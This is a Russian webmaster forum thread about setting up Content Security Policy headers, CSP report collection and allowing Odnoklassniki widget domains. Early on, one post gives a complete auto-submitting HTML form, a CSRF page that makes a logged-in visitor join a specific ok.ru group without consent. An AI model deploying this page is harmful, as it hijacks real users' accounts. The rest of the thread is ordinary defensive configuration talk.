- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Зачем быть уникальным в мире, где все можно скопировать
Почему так важна уникальность текста и как она влияет на SEO
Ingate Organic
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Классическая CSRF. И что, это реально работает и админы OK об этом не знают?
Работает или нет, не знаю, у меня нет групп в OK. У кого есть аккаунты в одноклассниках - могут проверить, вот полный код вражеского ифрейма:
<html>
<head>
<title>ок</title>
</head>
<body>
<form action="http://ok.ru/group/52509593960551[?cmd=PopLayer&st.cmd=altGroupMain&st.layer.cmd=PopLayerJoinClosedAltGroup&st.layer.groupId=52509593960551[&st.layer.loc=GR_RESTRICTED&st.layer.opt1=on&st.groupId=52509593960551[&st._aid=JoinGroupFromMiddleColumnButton&st.layer._bh=651&st.layer._bw=1636&gwt.requested=19ba39b7&p_sId=758859934531081434" method="post">
<input type="submit" class="button-pro" name="REPLIER" value="Вступить в группу"><a class="widget_popup_cancel" href="javascript:window.close();">Отменить</a>
</form>
<script type="text/javascript">
document.getElementsByTagName("form")[0].submit();
</script>
</body>
</html>
Можно сделать эту страничку и зайти на неё залогиненным в OK. И посмотреть, добавился ты автоматом или нет в группу ok.ru/group/52509593960551 -> ok.ru/beautifully.said.
Может кто сталкивался, как правильно настроить правила для спец команд браузера?
safari-resource:
chromenull:
about:blank
null
Не получается. Пробовал в секции script-src, default-src, но все равно csp режет.
То есть, однаклассникам нельзя открывать доступ??
Сегодня первый день поставила:
Соц. сети - там кнопка поделиться, +вк виджет.
Без *. виджет не работают, а у др. соц. сетях в консоли куча ошибок!
Я не пойму по счет
В корень наверно опасно ставить по стандартному пути? Никто не воспользуется php в корыстных планах??
Может
и затем, куда я получаю информацию? Было бы здорово ,если в какую-то папку и там по датам расфасовано. Не нужные даты - удаляем вручную.Соберу в одном месте:
Шаблон для CSP - пустой (ничего никому нельзя):
Под этот шаблон создаем файл csp.php в корне сайта:
Обращаем внимание что ***91 и ***93 - это квадратные скобки имеются ввиду))) Для этого файла нужна пустая директория (папка) в корне сайта с именем csp
В нее будут поступать отчеты с сортировкой по датам. Пути к файлу и папке отчетов можно менять по своему вкусу - на "скорость" это не влияет.
samimages, а какие права указать для csp.php ? Чтобы никто не смог открыть.
Вроде PHP невозможно открыть... но мало ли. :)
Его просто не откроют + там заголовок гадкий)))
Правильно ли понял, составленный текст нужно занести в файл .htaccess?
Правильно ли понял, составленный текст нужно занести в файл .htaccess?
Да, вот шаблон для htaccess/Apache ("" не забудьте вокруг "тела" заголовка):
Для веб-сервера на nginx - см этот пост от Malcolm. Как сделать правильную обвязку типа <ifModule mod_headers.c> для nginx(и делается ли она) - я не в курсе.
Сегодня утром одноклассники для своих виджетов поменяли урл загружаемого фрейма - теперь это connect.ok.ru, ранее использовали connect.odnoklassniki.ru.
Проверьте сайты и у кого не работает виджет от одноклассников, в директиву frame-src добавьте: https://*.ok.ru *.ok.ru.
А для полной уверенности все их домены можно внести в директивы script-src и frame-src: https://*.ok.ru *.ok.ru https://*.odnoklassniki.ru *.odnoklassniki.ru.
А что за www.superfish.com блокирует CSP на всех моих сайтах? Кто это вообще и что с ними делать?